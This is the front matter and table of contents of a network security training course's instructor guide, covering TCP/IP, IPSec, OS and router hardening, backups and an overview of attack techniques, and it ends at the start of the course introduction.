Hardening The Infrastructure (SCP): Instructor Guide, Instructor Edition (Do Not Duplicate)

Uploaded by manh-khoi, 14-Dec-2014.

HARDENING THE INFRASTRUCTURE (SCP)

Course Edition: 1.1
For software version: NA

ACKNOWLEDGEMENTS

Project Team

Curriculum Developer and Technical Writers: Warren Peterson, Shrinath Tandur and Uday O. Ali Pabrai • Copy Editors: Carin Peterson and Laura Thomas • Reviewing Editor: Christy D. Johnson • Technical Editors: Charles Nicchia and Cory Brown • Quality Assurance Analysts: Tracy Andrews, Frank Wosnick and Lance Anderson • Graphics Designer: Isolina Salgado Toner

Project Support

Development Assistance: Robert Young, David Young, Steve Richter and Pamela J. Taylor • Content Manager: Clare Dygert

NOTICES

DISCLAIMER: While Element K Press LLC takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy, and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of merchantability or fitness for a particular purpose. The names and IP addresses used in the data files for this course are those of a fictitious company. Any resemblance to current or future companies is purely coincidental. We do not believe we have used anyone’s name or IP address in creating this course, but if we have, please notify us and we will change the name in the next revision of the course. Element K is an independent provider of integrated training solutions for individuals, businesses, educational institutions, and government agencies. Use of screenshots, photographs of another entity’s products, or another entity’s product name or service in this book is for editorial purposes only. No such use should be construed to imply sponsorship or endorsement of the book by, nor any affiliation of such entity with Element K. Some of the tools and procedures presented in this course could cause problems if used improperly or maliciously in a live network environment. These tools are not a threat in any simulated activities presented here, nor are they a threat when presented as part of instructor-led training in a closed classroom environment. However, the installation and use of the programs or procedures presented outside of a controlled environment is the sole responsibility of the end-user and may result in criminal prosecution. Element K does not endorse or recommend the illegal use of any of the scanning or hacking tools described in this course. This courseware contains links to sites on the Internet that are owned and operated by third parties (the “External Sites”). Element K is not responsible for the availability of, or the content located on or through, any External Site. Please contact Element K if you have any concerns regarding such links or External Sites.

TRADEMARK NOTICES: Element K and the Element K logo are trademarks of Element K LLC. The Security Certified Program is a registered trademark of Ascendant Learning, LLC, in the U.S. and other countries; the Security Certified Program products and services discussed or described may be trademarks of Ascendant Learning, LLC. All other product names and services used throughout this book may be common law or registered trademarks of their respective proprietors.

Copyright © 2003 Element K Content LLC. All rights reserved. Screenshots and IP addresses used for illustrative purposes are the property of the software proprietor. This publication, or any part thereof, may not be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, storage in an information retrieval system, or otherwise, without express written permission of Element K, 500 Canal View Boulevard, Rochester, NY 14623, (585) 240-7500, (800) 434-3466. Element K Press LLC’s World Wide Web site is located at www.elementkcourseware.com.

The glossary contains terms from the National Security Agency (NSA) and is reprinted with permission. Reproduction of these terms in any format without the explicit written consent of Element K or the NSA is strictly prohibited.

The section that discusses IIS 5 exploits and alerts has been printed with permission from eEye Digital Security. Copyright© 1998-2001 eEye Digital Security.

This book conveys no rights in the software or other products about which it was written; all use or licensing of such software or other products is the responsibility of the user according to terms and conditions of the owner. Do not make illegal copies of books or software. If you believe that this book, related materials, or any other Element K materials are being reproduced or transmitted without permission, please call 1-800-478-7788.

ii Hardening The Infrastructure (SCP)

Course Number: NH85545 (IGEE)


CONTENT OVERVIEW

About This Course . . . xix
Lesson 1: Advanced TCP/IP . . . 1
Lesson 2: Implementing IPSec . . . 77
Lesson 3: Hardening Linux Computers . . . 137
Lesson 4: Hardening Windows Computers . . . 235
Lesson 5: Routers and Access Control Lists . . . 321
Lesson 6: Contingency Planning . . . 379
Lesson 7: Security on the Internet and the WWW . . . 421
Lesson 8: Attack Techniques . . . 481
Appendix A: Hardening the Infrastructure Exam Objectives . . . 543
Glossary . . . 549
Index . . . 567


CONTENTS

About This Course . . . xix
Course Setup Information . . . xxiv
How To Use This Book . . . l

LESSON 1: ADVANCED TCP/IP

Topic 1A TCP/IP Concepts . . . 3
  RFCs . . . 6
  The Function of IP . . . 7
  The Subnet Mask . . . 10
  Task 1A-1 Layering and Address Conversions . . . 12
  Routing . . . 12
  VLSM and CIDR . . . 13
  X-casting . . . 14
  Task 1A-2 Routers and Subnetting . . . 14

Topic 1B Analyzing the Three-way Handshake . . . 16
  Connections . . . 18
  Ports . . . 20
  Network Monitor . . . 22
  Task 1B-1 Using Network Monitor . . . 27
  Ethereal . . . 28
  Task 1B-2 Installing and Starting Ethereal . . . 29
  Ethereal Overview . . . 29
  Task 1B-3 Using Ethereal . . . 32
  TCP Connections . . . 33
  Task 1B-4 Analyzing the Three-way Handshake . . . 33
  The Session Teardown Process . . . 34
  Task 1B-5 Analyzing the Session Teardown Process . . . 35

Topic 1C Capturing and Identifying IP Datagrams . . . 35
  Task 1C-1 Capturing and Identifying IP Datagrams . . . 37

Topic 1D Capturing and Identifying ICMP Messages . . . 38
  Task 1D-1 Capturing and Identifying ICMP Messages . . . 39

Topic 1E Capturing and Identifying TCP Headers . . . 40
  Task 1E-1 Capturing and Identifying TCP Headers . . . 42


Topic 1F Capturing and Identifying UDP Headers . . . 43
  Task 1F-1 Working with UDP Headers . . . 43

Topic 1G Analyzing Packet Fragmentation . . . 44
  Task 1G-1 Analyzing Fragmentation . . . 45

Topic 1H Analyzing an Entire Session . . . 46
  Task 1H-1 Performing a Complete ICMP Session Analysis . . . 46
  Continuing the Complete Session Analysis . . . 49
  Task 1H-2 Performing a Complete FTP Session Analysis . . . 50

Topic 1I Fundamentals of IPv6 . . . 62
  IPv6 Addresses . . . 62
  Unicasting and Multicasting . . . 63
  IPv6 Security . . . 64
  Task 1I-1 Installing IPv6 . . . 64
  IPv6 Interfaces . . . 66
  Task 1I-2 Getting Another 6-over-4 Address . . . 68
  IPv6 Utilities . . . 68
  Task 1I-3 Interface Initializing . . . 69
  Using the ipsec6.exe Command . . . 69
  Task 1I-4 Using the ipsec6 Command . . . 69
  Using the ping6.exe Command . . . 70
  Task 1I-5 Using the ping6 Command . . . 70
  Capturing and Analyzing IPv6 Traffic . . . 71
  Task 1I-6 Capturing and Analyzing IPv6 Traffic . . . 71
  Lesson Review 1 . . . 72

LESSON 2: IMPLEMENTING IPSEC

Topic 2A Internet Protocol Security . . . 78
  Modes . . . 79
  IPSec Implementation . . . 80
  Task 2A-1 Describing the Need for IPSec . . . 81

Topic 2B IPSec Policy Management . . . 81
  The MMC . . . 81
  Task 2B-1 Examining the MMC . . . 82
  IPSec Policies . . . 83
  Task 2B-2 Identifying Default IPSec Security Policies . . . 83
  Saving the Customized MMC Configuration . . . 84
  Task 2B-3 Saving a Customized MMC . . . 84
  The Secure Server (Require Security) Policy . . . 84
  Task 2B-4 Examining Security Methods . . . 85
  The Rules Tab for the Secure Server (Require Security) Policy . . . 86
  Task 2B-5 Examining Policy Rules . . . 88


Topic 2C IPSec AH Implementation . . . 89
  Task 2C-1 Preparing the System Setup and Configuration . . . 90
  Creating Custom IPSec Policies . . . 90
  Task 2C-2 Creating the 1_REQUEST_AH(md5)_only Policy . . . 93
  Editing Authentication Method Policies . . . 95
  Task 2C-3 Editing the 1_REQUEST_AH(md5)_only Policy . . . 95
  Setting Up the Computer’s Response . . . 96
  Task 2C-4 Configuring the Policy Response . . . 97
  Configuring AH in Both Directions . . . 98
  Task 2C-5 Configuring the Second Computer . . . 98
  Configuring FTP . . . 99
  Task 2C-6 Setting Up the FTP Process . . . 100
  Implementing the IPSec Policy . . . 100
  Task 2C-7 Implementing the 1_REQUEST_AH(md5)_only Policy . . . 101
  Request-only Session Analysis . . . 101
  Task 2C-8 Analyzing the Request-only Session . . . 102
  Implementing a Request-and-Respond Policy . . . 102
  Task 2C-9 Configuring a Request-and-Respond IPSec Session . . . 102
  Request-and-Respond Session Analysis . . . 103
  Task 2C-10 Analyzing the Request-and-Respond Session . . . 103
  Implementing a Require IPSec Policy . . . 104
  Task 2C-11 Implementing the 2_REQUIRE_AH(md5)_only Policy . . . 104
  Mismatched AH Implementation . . . 105
  Task 2C-12 Attempting to Use Different IPSec Policies . . . 106
  Mismatched IPSec Session Analysis . . . 106
  Task 2C-13 Analyzing a Mismatched IPSec Policy Session . . . 106
  Implementing and Analyzing the Require Response Policy . . . 107
  Task 2C-14 Implementing and Analyzing a Require IPSec Policy Session . . . 107

Topic 2D IPSec ESP Implementation . . . 108
  Implementing a Request ESP IPSec Policy . . . 108
  Task 2D-1 Creating the 3_REQUEST_ESP(des)_only IPSec Policy . . . 108
  Configuring the ESP IPSec Response . . . 110
  Task 2D-2 Creating the 3_RESPOND_ESP(des)_only IPSec Policy . . . 110
  ESP Request-and-Response Session Analysis . . . 111
  Task 2D-3 Enabling IPSec ESP Policies . . . 112
  Implementing an ESP IPSec Session . . . 113
  Task 2D-4 Configuring and Analyzing an ESP IPSec Session . . . 113
  ESP Analysis . . . 114
  Creating a Require ESP IPSec Policy . . . 114
  Task 2D-5 Implementing the 4_REQUIRE_ESP(des)_only IPSec Policy . . . 114
  Configuring a Require ESP IPSec Session . . . 115
  Task 2D-6 Require-and-Respond ESP Implementation and Analysis . . . 116

Topic 2E Combining AH and ESP in IPSec . . . 117
  Task 2E-1 Creating the 5_REQUEST_AH(md5)+ESP(des) IPSec Policy and the Response Policy . . . 117


  Configuring the IPSec Response . . . 119
  Task 2E-2 Creating the 5_RESPOND_AH(md5)+ESP(des) IPSec Policy . . . 119
  AH and ESP IPSec Session Analysis . . . 120
  Task 2E-3 Configuring and Analyzing an IPSec Session Using AH and ESP . . . 121
  Requiring AH and ESP in an IPSec Session . . . 122
  Task 2E-4 Creating the 6_REQUIRE_AH(md5)+ESP(des) IPSec Policy . . . 123
  Using Mismatched AH and ESP IPSec Policies . . . 124
  Task 2E-5 Matching and Analyzing AH and ESP IPSec Policies . . . 124
  Configuring All the Options . . . 125
  Task 2E-6 Implementing the 7_REQUIRE_AH(sha)+ESP(sha+3des) Policy . . . 126
  Configuring the AH-and-ESP IPSec Response Policy . . . 127
  Task 2E-7 Implementing the 7_RESPOND_AH(sha)+ESP(sha+3des) Policy . . . 127
  Implementing the Full IPSec Session . . . 128
  Task 2E-8 Implementing and Analyzing an AH(sha) and ESP(sha+3des) IPSec Session . . . 129
  Using the Filter Lists . . . 129
  Task 2E-9 Editing Filter Lists to Explicitly Secure Traffic . . . 130
  Using Certificates . . . 132
  Task 2E-10 Using Certificates for Authentication . . . 132
  Disabling IPSec . . . 134
  Task 2E-11 Removing IPSec . . . 134
  Lesson Review 2 . . . 135

LESSON 3: HARDENING LINUX COMPUTERS

Topic 3A Introduction to Linux Administration . . . 138
  Linux . . . 139
  Basic Navigation in Linux . . . 139
  Task 3A-1 Navigating in Linux . . . 145
  User and Group Accounts . . . 146
  Task 3A-2 Creating and Modifying Users and Groups . . . 150
  Switching User Accounts . . . 151
  Linux File System . . . 151
  Task 3A-3 Viewing File Details . . . 156
  Object Ownership . . . 156
  Webmin . . . 157
  Task 3A-4 Installing Webmin . . . 158
  System Information . . . 158
  Task 3A-5 Viewing System Information . . . 162

Topic 3B Fundamental Linux Security . . . 162
  File and Directory Permissions . . . 162
  Task 3B-1 Creating Object Ownerships . . . 166
  Assigning Permissions . . . 167
  Task 3B-2 Assigning Permissions . . . 167
  Testing Assigned Permissions . . . 167


  Task 3B-3 Verifying Permissions . . . 168
  The SetUID, SetGID, and the Sticky Bit Permissions . . . 169
  Task 3B-4 Configuring umask Settings . . . 172
  Password Security . . . 172
  Task 3B-5 Viewing the Password Files . . . 176
  Managing Passwords . . . 176
  Task 3B-6 Managing Passwords . . . 177
  Pluggable Authentication Modules (PAM) . . . 177
  Security Updates . . . 182

Topic 3C Access Control . . . 183
  TCP Wrappers . . . 183
  Task 3C-1 Controlling Access with TCP Wrappers . . . 187
  The xinetd Superdaemon . . . 187
  Task 3C-2 Managing Telnet with xinetd . . . 193

Topic 3D Securing Network Services . . . 194
  NFS . . . 194
  Task 3D-1 Sharing Data with NFS . . . 200
  Securing NFS . . . 200
  Task 3D-2 Verifying Export Permissions . . . 202
  NIS . . . 202
  What is Samba? . . . 203
  Task 3D-3 Configuring the Samba Server . . . 207

Topic 3E Final OS Hardening . . . 210
  Removing Services . . . 211
  Task 3E-1 Stopping Unneeded Services . . . 212
  Linux Run Levels . . . 213
  SSH . . . 213
  Task 3E-2 Configuring an SSH Server . . . 214
  Configuring and Using the SSH Client . . . 214
  Task 3E-3 Configuring an SSH Client . . . 215
  Tripwire . . . 216
  Task 3E-4 Starting Tripwire . . . 220
  Logging . . . 224
  Task 3E-5 Logging Recent Login Activity . . . 226
  The xferlog Log File . . . 227
  Web Server Log Files . . . 227
  The secure Log File . . . 227
  Using the Log Viewer . . . 228
  Task 3E-6 Using the Log Viewer . . . 228
  Securing Log Files . . . 229
  Bastille . . . 229
  Task 3E-7 Installing and Exploring Bastille . . . 231
  Lesson Review 3 . . . 232


LESSON 4: HARDENING WINDOWS COMPUTERS

Topic 4A Windows 2000 Infrastructure Security . . . 236
  Active Directory Components . . . 237
  Windows 2000 DNS . . . 241
  Group Policy Components . . . 242
  Group Policy Implementation . . . 242
  Task 4A-1 Configuring a Custom MMC and GPO . . . 243
  Editing GPOs . . . 243
  Task 4A-2 Editing a GPO . . . 244
  Enforcing GPOs . . . 244
  Task 4A-3 Implementing Multiple GPOs . . . 245

Topic 4B Windows 2000 Authentication . . . 246
  Authentication Methods . . . 246
  SYSKEY . . . 249
  The Challenge and Response . . . 250
  Windows 2000 Local Logon Process . . . 250
  Kerberos in Windows 2000 . . . 251
  Smart Cards in Windows 2000 . . . 252
  Task 4B-1 Configuring NTLMv2 Authentication . . . 252

Topic 4C Windows 2000 Security Configuration Tools . . . 253
  The Gold Standard . . . 253
  User and Group Security . . . 253
  Restricting Logon Hours . . . 253
  Expiration Dates for User Accounts . . . 254
  Configuring Windows 2000 Groups . . . 254
  Locking Down the Administrator Account . . . 255
  Task 4C-1 Securing Administrator Account Access . . . 256
  Testing Administrative Access . . . 258
  Task 4C-2 Testing Administrative Access . . . 258
  Group Policies . . . 259
  Local Security Policy . . . 260
  Task 4C-3 Verifying Password Requirements . . . 260
  Password Recommendations . . . 261
  Security Templates . . . 262
  Task 4C-4 Analyzing Default Password Settings of Security Templates . . . 264
  Custom Security Templates . . . 264
  Task 4C-5 Creating a Custom Security Template . . . 264
  Security Configuration and Analysis Snap-In . . . 265
  Task 4C-6 Investigating the Security Configuration and Analysis Snap-In . . . 266
  Template Implementation . . . 266
  Task 4C-7 Implementing the Template . . . 267
  The secedit.exe Utility . . . 267
  Task 4C-8 Analyzing the Current Security Settings of the Local System . . . 267


  Analyzing and Implementing the Gold Standard . . . 268
  Task 4C-9 Configuring Policies to the Gold Standard . . . 269
  Analyzing the Gold Standard . . . 269
  Task 4C-10 Analyzing the Gold Standard . . . 270

Topic 4D Windows 2000 Resource Security . . . 272
  Task 4D-1 Compromising NTFS Security . . . 275
  The NULL Session . . . 275
  Windows 2000 Printer Security . . . 276
  Windows 2000 Registry Security . . . 276
  Default Registry Configurations . . . 277
  Task 4D-2 Setting Registry Permissions . . . 278
  Registry Backup . . . 278
  Task 4D-3 Saving Registry Information . . . 278
  Blocking Access to the Registry . . . 279
  Task 4D-4 Blocking Registry Access . . . 279
  System Hardening . . . 280
  Task 4D-5 Removing Unneeded Subsystems . . . 283

Topic 4E Windows 2000 Auditing and Logging . . . 283
  Object Auditing . . . 285
  Task 4E-1 Enabling Auditing . . . 286
  Registry Auditing . . . 286
  Task 4E-2 Logging SAM Registry Access . . . 287
  Managing the Event Viewer . . . 288
  Task 4E-3 Viewing the Registry Audit . . . 290
  Event IDs . . . 291
  Authentication Logging . . . 291
  Task 4E-4 Creating Events . . . 293
  Viewing Event Logs . . . 294
  Task 4E-5 Viewing Event Logs . . . 294
  Managing Log Files . . . 295

Topic 4F Windows 2000 EFS . . . 296
  Task 4F-1 Encrypting Files . . . 298

Topic 4G Windows 2000 Network Security . . . 298
  Task 4G-1 Investigating Printer Spooler Security . . . 299
  Communicating without NetBIOS . . . 301
  Task 4G-2 Communication without NetBIOS . . . 301
  NAT and ICS . . . 303
  Remote Access . . . 303
  RADIUS Implementation in the Classroom . . . 304
  Task 4G-3 Physically Preparing for RADIUS Implementation . . . 304
  Configuring the Dialup Server . . . 305
  Task 4G-4 Configuring the Dialup Server Configuration . . . 305
  Configuring the Dialup Client . . . 307
  Task 4G-5 Configuring the Dialup Client . . . 307


  Creating Users on the RADIUS Server ..... 308
  Task 4G-6 Creating Users on the RADIUS Server ..... 308
  IAS ..... 309
  Task 4G-7 Installing IAS ..... 309
  RIP ..... 310
  Task 4G-8 Installing RIP ..... 310
  Configuring the Dialup Server as a RADIUS Client ..... 311
  Task 4G-9 Configuring the Dialup Server as a RADIUS Client ..... 311
  Testing the Dialup Client ..... 312
  Task 4G-10 Testing the Dialup Client ..... 312
  Bringing Back the Network ..... 313
  Task 4G-11 Reconfiguring the Network ..... 313
  Hardening TCP/IP ..... 314
  Task 4G-12 Configuring TCP/IP in the Registry ..... 315
  TCP/IP Filtering ..... 316
  Task 4G-13 Configuring Port and Protocol Filtering ..... 317

Lesson Review 4 ..... 318

LESSON 5: ROUTERS AND ACCESS CONTROL LISTS

Topic 5A Fundamental Cisco Security ..... 322
  Authentication and Authorization ..... 325
  Configuring Access Passwords ..... 325
  Task 5A-1 Configuring Passwords ..... 327
  Creating User Accounts ..... 327
  Implementing Banners ..... 327
  Implementing Cisco Banners ..... 328
  Task 5A-2 Configuring Login Banners ..... 329
  SSH Overview ..... 330
  Router Configuration to use SSH ..... 330
  Task 5A-3 Configuring SSH on a Router ..... 332
  Task 5A-4 Configuring the SSH Client ..... 334

Topic 5B Routing Principles ..... 334
  The ARP Process ..... 334
  LAN-to-LAN Routing Process ..... 337
  LAN-to-WAN Routing Process ..... 338
  Task 5B-1 Performing IP and MAC Analysis ..... 339
  The Routing Process ..... 340
  Static and Dynamic Routing ..... 342
  Comparing Routed Protocols and Routing Protocols ..... 345
  The Routing Protocols ..... 346
  RIP ..... 350
  Task 5B-2 Viewing a RIP Capture ..... 351
  RIPv2 ..... 351
  Task 5B-3 Viewing a RIPv2 Capture ..... 353


Topic 5C Removing Protocols and Services ..... 354
  CDP ..... 354
  Task 5C-1 Turning Off CDP ..... 355
  ICMP ..... 355
  Task 5C-2 Hardening ICMP ..... 356
  Source Routing ..... 356
  Small Services ..... 357
  Finger ..... 357
  Remaining Services ..... 358
  Task 5C-3 Removing Unneeded Services ..... 359

Topic 5D Creating Access Control Lists ..... 359
  Access Control List Operation ..... 360
  The Access List Process ..... 360
  The Wildcard Mask ..... 361
  Task 5D-1 Creating Wildcard Masks ..... 363

Topic 5E Implementing Access Control Lists ..... 363
  Defending Against Attacks with ACLs ..... 367
  Task 5E-1 Creating Access Control Lists ..... 369

Topic 5F Logging Concepts ..... 369
  Configuring Logging ..... 371
  Task 5F-1 Configuring Buffered Logging ..... 373
  ACL Logging ..... 374
  Task 5F-2 Configuring Anti-spoofing Logging ..... 376

Lesson Review 5 ..... 377

LESSON 6: CONTINGENCY PLANNING

Topic 6A Continuity and Recovery ..... 380
  Planning for Backups ..... 380
  Disasters ..... 380
  Security Policies and Their Impact on the Business ..... 382

Topic 6B Developing the Plan ..... 384
  Requirements and Goals of a Contingency Plan ..... 384
  Creating the Contingency Plan ..... 385
  Testing the Plan ..... 385

Topic 6C The Technologies of Staying On ..... 387
  Personal UPS Devices ..... 387
  Task 6C-1 Configuring a UPS ..... 388
  Full Server Rack UPS Devices ..... 389
  Building Generators ..... 389


Topic 6D Backing Up the Operating Systems ..... 391
  Backup Strategies for Windows Computers ..... 398
  Task 6D-1 Creating a Folder Structure ..... 399
  Initiating the Backup Process ..... 399
  Task 6D-2 Initiating a Normal Backup ..... 400
  Viewing the Results of the Backup Process ..... 400
  Task 6D-3 Viewing the State of the Archive Attribute Bit ..... 401
  Restoring a File from Normal Backup ..... 401
  Task 6D-4 Restoring from a Backup ..... 401
  Understanding Differential Backup ..... 402
  Task 6D-5 Preparing to Start a Differential Backup Sequence ..... 402
  Backing Up Your Weekend's Work ..... 402
  Task 6D-6 Initiating a Differential Backup Sequence ..... 403
  Adding Data During the Week ..... 403
  Task 6D-7 Creating Additional Data ..... 403
  Backing Up Data During the Week ..... 404
  Task 6D-8 Continuing the Differential Backup Sequence ..... 404
  Adding More Data ..... 405
  Task 6D-9 Adding Data After a Differential Backup ..... 405
  Backing Up More Data ..... 405
  Task 6D-10 Differentially Backing Up More Data ..... 405
  Accidentally Deleting Data ..... 406
  Task 6D-11 Destroying Backed-up Data ..... 406
  Restoring Data from a Differential Backup ..... 406
  Task 6D-12 Restoring Files from a Differential Backup ..... 407
  Optional Tasks ..... 408
  Understanding Incremental Backup ..... 408
  Task 6D-13 Preparing to Start an Incremental Backup Sequence ..... 408
  Backing up Your Weekend's Work ..... 409
  Task 6D-14 Initiating an Incremental Backup Sequence ..... 409
  Adding Data During the Week ..... 409
  Task 6D-15 Creating Additional Data ..... 410
  Backing Up Data During the Week ..... 410
  Task 6D-16 Continuing the Incremental Backup Sequence ..... 410
  Adding More Data ..... 411
  Task 6D-17 Adding Data After an Incremental Backup ..... 411
  Backing Up More Data ..... 411
  Task 6D-18 Incrementally Backing Up More Data ..... 412
  Accidentally Corrupting Data ..... 412
  Task 6D-19 Corrupting Backed-up Data ..... 412
  Restoring Data from an Incremental Backup ..... 413
  Task 6D-20 Restoring an Incrementally Backed-up File ..... 413
  Performing an Incomplete Restore from Incremental Backup ..... 413
  Task 6D-21 Incompletely Restoring from Incremental Backup ..... 414
  Analyzing the Incremental Restore ..... 415
  Task 6D-22 Completely Restoring from Incremental Backup ..... 415


  Backup Options for Linux Computers ..... 415
  Task 6D-23 Using the tar Command for Incremental Backups ..... 417
  Backup Strategies for Cisco Routers ..... 417
  Task 6D-24 Backing Up Cisco Router Configurations ..... 418

Lesson Review 6 ..... 419

LESSON 7: SECURITY ON THE INTERNET AND THE WWW

Topic 7A Describing the Components of the Internet ..... 422
  The Backbone (or Layer 1 of the Internet) ..... 422
  Network Service Providers (NSPs) ..... 423
  Long Distance Carriers ..... 423
  NAPs ..... 423
  ISPs at Work ..... 424
  The Organizations that Help Run the Internet (or Layer 8 of the Internet) ..... 425
  DNS Revealed ..... 426
  Task 7A-1 Defining Internet Components ..... 428

Topic 7B Identifying the Weak Points of the Internet ..... 428
  Targeting the Routers ..... 429
  Targeting the ISPs ..... 430
  Targeting DNS ..... 430
  Task 7B-1 Identifying Weak Points of the Internet ..... 432
  DNS Security ..... 432
  Configuring DNS for Windows 2000 ..... 433
  Task 7B-2 Installing a Standard Primary DNS Server on a Windows 2000 Server ..... 434
  Reverse Lookup Zones ..... 434
  Task 7B-3 Creating Reverse Lookup Zones ..... 435
  Forward Lookup Zones ..... 435
  Task 7B-4 Creating a Forward Lookup Zone ..... 436
  Installing DNS ..... 436
  Task 7B-5 Installing DNS Servers ..... 437
  Zone Configuration ..... 437
  Task 7B-6 Creating, Viewing, and Deleting Forward and Reverse Lookup Zones ..... 438
  Standard Secondary DNS Servers ..... 439
  Task 7B-7 Creating Secondary Zones ..... 439
  Zone Transfers ..... 440
  Task 7B-8 Attempting Blocked Zone Transfers ..... 440

Topic 7C Describing Web Hacking Techniques ..... 441
  Vulnerability Scanning ..... 441
  Incorrect Web Design ..... 442
  Buffer Overflows ..... 443


  Task 7C-1 Identifying Web Hacking Techniques ..... 444
  Web Server Security ..... 444
  IIS Security ..... 445
  Task 7C-2 Investigating IIS Security ..... 446
  Web Site Configuration ..... 446
  Task 7C-3 Implementing a Web Site ..... 446
  Web Site Maintenance ..... 448
  Task 7C-4 Starting and Stopping the Web Server ..... 448
  DoS Problems ..... 448
  Task 7C-5 Controlling Performance Settings ..... 449
  Web Server Directory Security ..... 449
  Task 7C-6 Controlling the Home Directory Settings ..... 449
  Web Server Access Controls ..... 449
  Task 7C-7 Controlling Access Settings ..... 450
  Patches and Hot Fixes ..... 451
  Task 7C-8 Using the IIS Lockdown Tool ..... 452
  Hot-fix Checker ..... 452
  Task 7C-9 Using the Hot Fix Net Check Tool ..... 453
  Apache ..... 454

Topic 7D Describing Methods Used to Attack Users ..... 455
  Email Hack Attacks ..... 455
  Cookies ..... 460
  DSL and Cable Modem Vulnerabilities ..... 460
  Task 7D-1 Identifying User Vulnerabilities and Internet Security Concerns ..... 461
  Browser Security ..... 461
  General Settings for Internet Explorer 6 ..... 462
  Task 7D-2 Viewing the General Settings for Your Browser ..... 462
  Advanced Settings for Internet Explorer 6 ..... 464
  Task 7D-3 Viewing the Advanced Settings for Your Browser ..... 464
  Security Settings for Internet Explorer 6 ..... 466
  Task 7D-4 Viewing the Zone Settings for Your Browser ..... 466
  Default Security Settings ..... 467
  Task 7D-5 Implementing Default Security Levels for Zones ..... 467
  The Low Security Setting ..... 468
  Task 7D-6 Viewing Detailed Settings for the Security Level Low ..... 468
  The High Security Setting ..... 469
  Task 7D-7 Viewing Detailed Settings for the Security Level High ..... 470
  The Microsoft Virtual Machine ..... 471
  Task 7D-8 Viewing the Custom Settings for Microsoft VM (Java Settings) ..... 471
  How to Make Best Use of These Zones ..... 472
  Task 7D-9 Adding Sites to a Zone ..... 472
  Cookies ..... 473
  Task 7D-10 Viewing Cookie Handling Settings ..... 473
  Content Ratings ..... 473
  Task 7D-11 Viewing Content Ratings ..... 474


  Using Content Ratings ..... 474
  Task 7D-12 Configuring a Browser to Use Content Ratings ..... 474
  Certificates ..... 475
  Task 7D-13 Properties of the Certificates Section ..... 475
  Your Personal Information ..... 476
  Task 7D-14 Viewing the Handling of Personal Information by a Browser ..... 476
  Email Security ..... 477
  Task 7D-15 Basic Security Settings to Take Care of With Your Email Client ..... 477

Lesson Review 7 ..... 479

LESSON 8: ATTACK TECHNIQUES

Topic 8A Network Reconnaissance ..... 483
  Who is the Target? ..... 484
  Studying the Message Source ..... 486

Topic 8B Mapping the Network ..... 488
  Using Traceroute ..... 488
  Task 8B-1 Using Windows Tracing Tools ..... 489
  Using traceroute on Linux ..... 489
  Using Graphical Tracing Tools ..... 489
  Task 8B-2 Using VisualRoute ..... 491

Topic 8C Sweeping the Network ..... 492
  Ping Sweeping ..... 492
  Windows Ping Sweepers ..... 493
  Task 8C-1 Using SuperScan ..... 495

Topic 8D Scanning the Network ..... 496
  Port Scanning ..... 496
  The netstat Tool ..... 497
  Service Identification ..... 497
  Task 8D-1 Using nmap ..... 499
  Windows Port Scanners ..... 499
  Task 8D-2 Using SuperScan ..... 501
  Identifying the Operating System and OS Version ..... 502
  Using nmap to Identify the OS ..... 505
  Task 8D-3 Using nmap to Identify an Operating System ..... 506
  Using the nmap Front End ..... 506
  Task 8D-4 Using nmap Front End ..... 507
  Using Nessus to Perform a Scan ..... 507
  Task 8D-5 Installing Nessus for First-time Use ..... 510
  Scanning for Vulnerabilities with Nessus ..... 510
  Task 8D-6 Using Nessus for Vulnerability Scanning ..... 511

Topic 8E Viruses, Worms, and Trojan Horses ..... 512
  Differentiating Between a Virus and a Worm ..... 512


  The Trojan Horse ..... 513
  The SubSeven Trojan ..... 513
  NetBus ..... 514
  ..... 516
  Task 8E-1 Using NetBus Pro ..... 516

Topic 8F Malicious Web Sites ..... 517
  Task 8F-1 Implementing a Malicious Web Site ..... 517
  Falling Victim to a Malicious Web Site ..... 518
  Task 8F-2 Visiting a Malicious Web Site ..... 518

Topic 8G Gaining Control Over the System ..... 519
  Task 8G-1 Using Netcat ..... 519

Topic 8H Recording Keystrokes ..... 520
  Task 8H-1 Using Software Keystroke Logging ..... 521
  Hardware Keyloggers ..... 521
  Task 8H-2 Using a Keystroke-logging Keyboard ..... 522

Topic 8I Cracking Encrypted Passwords ..... 523
  Cracking Passwords with L0pht ..... 523
  Task 8I-1 Using L0pht LC4 ..... 526
  Cracking Passwords with John the Ripper ..... 527
  Task 8I-2 Using John the Ripper ..... 527

Topic 8J Revealing Hidden Passwords ..... 529
  Task 8J-1 Revealing Hidden Passwords ..... 530

Topic 8K Social Engineering ..... 531
  Task 8K-1 Discussing Social Engineering Examples ..... 532

Topic 8L Case Study: Social Engineering ..... 532
  Task 8L-1 Reviewing the Social Engineering Case Study ..... 535

Topic 8M Gaining Unauthorized Access ..... 535
  GRUB ..... 537
  Task 8M-1 Investigating the Single User GRUB Loader ..... 537

Topic 8N Hiding Evidence of an Attack ..... 538

Topic 8O Performing a Denial of Service ..... 538
  Task 8O-1 Flooding with Udpflood ..... 539
  OOB Exploit ..... 539

Lesson Review 8 ..... 540


Glossary ..... 549

Index ..... 567


APPENDIX A: HARDENING THE INFRASTRUCTURE EXAM OBJECTIVES

Exam Objectives ..... 543


ABOUT THIS COURSE

Hardening the Infrastructure is designed to provide network administrators with an awareness of security-related issues and the essential skills they need to implement security in a given network. It is the first course offered in the first level of the Security Certified Program.

The Security Certified Program (SCP)

Wherever you are in life, you will find that the people around you have certain skills that help position them in the fields they want to work in. Doctors, lawyers, engineers, and architects are just a few of the many examples. So it should be no surprise that the computer and networking fields have come to create and foster certifications to help individuals prove to employers, and to themselves, that they have the skills required to perform adequately in their specific fields, whether they are an entry-level person beginning with a basic hardware repair technician certification or an infrastructure expert heading for the highest level of router certification.

What is the Security Certified Program?

Ascendant Learning, a Chicago-based security training organization, has createdthe Security Certified Program (SCP) to help develop and validate your skills as acomputer and network security professional.

The SCP structure is unique as it measures competence in core security skills as well as skills needed for specific security technologies, such as Packet Structure and Signature Analysis, Operating System Hardening, Router Security, Firewalls, Virtual Private Networks (VPNs), Intrusion Detection, Risk Analysis, Digital Signatures and Certificates, Biometrics, and Network Forensics.

The SCP consists of two vendor-neutral security certifications. The first level of certification is the Security Certified Network Professional (SCNP), and the second level of certification is the Security Certified Network Architect (SCNA).


What is the SCNP?

